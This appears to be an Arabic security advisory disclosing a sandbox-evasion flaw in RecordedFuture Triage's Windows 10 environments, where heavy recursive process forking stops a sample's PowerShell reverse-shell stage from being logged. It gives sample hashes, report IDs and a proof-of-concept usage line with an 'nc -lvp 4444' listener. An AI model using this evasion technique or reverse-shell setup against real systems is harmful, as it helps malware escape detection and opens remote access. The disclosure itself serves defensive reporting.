
ثغرة أمنية حرجة (9.8) - قد يفشل محرك التحليل الديناميكي في RecordedFuture Triage في تسجيل السلوك الضار عندما تنتج العينات عمليات تفرع (forking) عالية الحجم بشكل متكرر، مما يؤدي إلى تقارير سلوكية غير متسقة أو مفقودة.
يحتوي صندوق تحليل RecordedFuture Triage على نظامي Windows 10 build 2004 وWindows 10 LTSC 2021 على ثغرة حرجة في محرك التحليل السلوكي لنظام Windows، والتي تسمح لعينة برمجية خبيثة مُرسلة بتجنب الاكتشاف والتسبب في حرمان التحليل. تُستغل الثغرة عندما تفرخ العينة بشكل متكرر عددًا كبيرًا من العمليات الفرعية، مما يولد حجم سجلات مرتفعًا ويستنزف موارد النظام. ونتيجة لذلك، قد لا يتم تسجيل أو الإبلاغ عن السلوك الخبيث الرئيسي، بما في ذلك تنفيذ PowerShell ونشاط الصدفة العكسية، مما يضلل المحللين ويعرض سلامة وتوافر نتائج التحليل في بيئة العزل للخطر.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:Hتُظهر العينة vathos_rev.exe (SHA256: 3c52178c27d2a0336f6286f6cf0a4a253a507273b1a19303edcacb39d2659a4b) حالة حرمان التحليل في محرك التحليل السلوكي لنظام Windows في RecordedFuture Triage.
عند إطلاقها تحت تكوينات Windows 10، تفرخ العينة آلاف العمليات الفرعية بشكل متكرر، مما يستنزف موارد تتبع العمليات والتسجيل. ونتيجة لذلك، يقدم صندوق التحليل بيانات سلوكية ضئيلة ويفشل في تسجيل الإجراءات الخبيثة الرئيسية.
win10v2004-20250610-enx64104s213s1/10vathos_rev.exewin10ltsc2021-20250619-enx64105s215s1/10vathos_rev.exeعبر بيئتي صندوق تحليل Windows 10 معًا، فشل الإطلاق في التقاط مراحل تنفيذ PowerShell والصدفة العكسية المتوقعة على الرغم من قيام البرنامج الخبيث بتنفيذ هذه السلوكيات على المضيف.
أصبح محرك التحليل السلوكي في صندوق التحليل مشبعًا بسبب التفرع التكراري للعمليات، مما أدى إلى بيانات قياس عن بعد مبتورة أو مفقودة.
يؤكد هذا ثغرة حرمان التحليل، إذ يفشل المحرك السلوكي في الإبلاغ عن النشاط الخبيث في ظل التكرار العالي وحجم السجلات الكبير، مما يؤدي إلى نتائج سلبية كاذبة ومخرجات جنائية غير مكتملة.
مرجع التقرير العام:
https://tria.ge/250822-qfystshk51
هذه ثغرة حرمان التحليل في RecordedFuture Triage يمكن أن تتسبب في فشل محرك التحليل الديناميكي في التقاط النشاط السلوكي أو الإبلاغ عنه. يسمح استغلالها للخصوم بتجاوز الكشف السلوكي وإنتاج تقارير تحليل غير مكتملة أو مفقودة.
التأثيرات الرئيسية
التبعات النهائية
vathos_rev.exe
3c52178c27d2a0336f6286f6cf0a4a253a507273b1a19303edcacb39d2659a4bdca2fc8f69f6493c7a9c1ce9a68b24549b4688ba4788e34bce47d91b0accc98d33dbf8d2924e866dfce8abaee30f94bf78254777b6f7fd6a35d091402a984c233a8f0cbd104ebe34559037356697ae39613781ca90bd5e9f2b6542309090e806ec5f674b270 KB250822-qfystshk51win10ltsc2021-20250619-enx642025-08-22 13:12 UTC2025-08-22 13:18 UTC250822-qfystshk51win10v2004-20250610-enx642025-08-22 13:12 UTC2025-08-22 13:18 UTCملاحظة: لا يكشف RecordedFuture علنًا عن تفاصيل بناء المحرك والإصدار الداخلي.
تستند جميع الملاحظات إلى عمليات إطلاق عامة قابلة للتكرار من منصة Triage التابعة لـ RecordedFuture (الإرسال250822-qfystshk51).
يعيد العرض التوضيحي المقدم إنتاج حالة حرمان التحليل (DoA) عن طريق توليد حجم عمليات مرتفع جدًا ونشاط زمن تنفيذ متداخل بعمق. يفرخ العرض التوضيحي العديد من العمليات الفرعية وينفذ فك تشفير XOR متعدد الجولات قبل مرحلة الصدفة العكسية النهائية عبر PowerShell. في بيئات Triage المتأثرة على Windows 10، لا يتم تسجيل مرحلة الحمولة النهائية أو يتم اقتطاعها، بينما تلتقط بيئات أخرى (مثل Windows 11) السلوك الكامل.
طريقة التشغيل
poc/vathos_demo.exe <IP> <PORT>
ابدأ مستمعًا (مثل nc -lvp 4444) على عنوان IP/المنفذ المحدد لملاحظة محاولات الاتصال. يفرخ العرض التوضيحي عددًا كبيرًا جدًا من العمليات وينفذ فك تشفير XOR متعدد الجولات، ليبلغ ذروته في مرحلة صدفة عكسية عبر PowerShell. في تكوينات Triage المتأثرة، قد لا يتم تسجيل مرحلة الحمولة النهائية على الرغم من قيام العينة بتنفيذها على المضيف.
الشكل 1 - لوحة نظرة عامة على Triage

الشكل 2 - تقرير السلوك لنظام Windows 10 v2004 (بيانات قياس عن بعد ضئيلة / مثال DoA)

الشكل 3 - تقرير السلوك لنظام Windows 10 LTSC 2021 (بيانات قياس عن بعد ضئيلة / مثال DoA)

الشكل 4 - مثال على العمليات المسجلة في Windows 10 LTSC (منقّح، وليست كل العمليات مسجلة) — سجلات التحليل ← العمليات
